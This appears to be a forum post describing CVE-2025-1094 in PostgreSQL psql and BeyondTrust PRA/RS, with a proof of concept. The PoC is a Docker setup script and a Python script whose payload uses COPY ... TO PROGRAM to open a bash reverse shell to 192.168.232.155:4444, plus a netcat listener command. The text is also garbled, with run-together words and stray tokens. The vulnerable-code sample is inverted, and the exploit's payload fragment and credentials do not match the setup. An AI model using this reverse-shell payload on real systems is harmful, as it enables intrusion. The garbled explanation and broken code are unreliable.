Target
- PostgreSQL 14.15
- BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Software
- Impacted versions: PostgreSQL 14.15 and BeyondTrust products using it
Explain
CVE-2025-1094 is a SQL injection vulnerability found in the PostgreSQL 14.15 version of the psql interactive tool. The vulnerability could allow an attacker to execute arbitrary commands due to improper validation of inputs, specifically in conjunction with BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) software, which could lead to remote code execution (RCE) attacks.Root Cause
The vulnerability occurred in the psql tool, which does not properly validate user input. In particular, if you use it, you can use meta commands (!)WITH COPY TO PROGRAM FUNCTION, YOU CAN EXECUTE SHELL COMMANDS.The vulnerability stems from a structural flaw that prevents PostgreSQL's tools from properly handling invalid UTF-8 strings. BeyondTrust's script passes a value to the script via an echo command, which allows an attacker to inject a malicious byte disguised as UTF-8 into the SQL query unsafely. This causes psql to stop executing SQL queries, and subsequent meta commands (such as ) are executed, leading to SQL injection.psqlthin-scc-wrappergskeydbquote0xC0 0x27pg_escape_string()\!
In addition, when combined with the CVE-2024-12356 vulnerability that allowed argument injection without safely handling arguments, it could lead to remote rogue RCE over the WebSocket protocol. This is a significant design flaw in that RCE is possible with incorrect UTF-8 handling of psql alone.echo $gskeyecho "$gskey"
Examples of vulnerable code:
PHP:
if (valid_utf8_check(input) == false) {
execute_sql(input);
}PoC
1. Vulnerable PostgreSQL 14.15 Environment Settings
Code:
#!/bin/bash
echo "[+] PostgreSQL 14.15 Downloading docker image..."
sudo docker pull postgres:14.15
echo "[+] PostgreSQL 14.15 Deploying container.."
sudo docker run-- name vulnerable_postgres \
-e POSTGRES_USER=postgres \
-e POSTGRES_PASSWORD=postgres \
-e POSTGRES_DB=testdb \
-p 5432:5432 \
-d postgres:14.15
echo "[+ ]Waiting for PostgreSQL to initialize..."
sleep 10
echo "[+] Creating vulnerable table..
."CREATE TABLE users (id SERIAL PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF
echo "[✓] Setup complete. You are now running a vulnerable PostgreSQL 14.15! "
Save the script as, grant it the execution permission, and run it.setup.sh
chmod +x setup.sh
sudo ./setup.sh
2. Exploit
import psycopg2# PostgreSQL Connection information
HOST = "127.0.0.1"
PORT = "5432"
DATABASE = "nullcave"
USER = "nullcave"
PASSWORD = "nullcavesec"
# RCE Malicious SQL injection payload for
Code:
payload = "users TO PROGRAM 'bash -c \"bash -i >& /dev/tcp/192.168.232.155/4444 0>&1\"';"
try:
conn = psycopg2.connect(host=HOST, port=PORT, dbname=DATABASE, user=USER, password=PASSWORD)
cursor = conn.cursor()
print("[+] PostgreSQL Connected to !")
cursor.execute(payload)
print("[✓] RCExecution complete! Check the Netcat listener")
except Exception as e:
print("[-] Exploit Failed:", str(e))
finally:
if conn:
cursor.close()
conn.close()nc -lvnp 4444
Afterwards, run the PoC script to acquire the remote shell.
python3 poc.py
Reacted by:
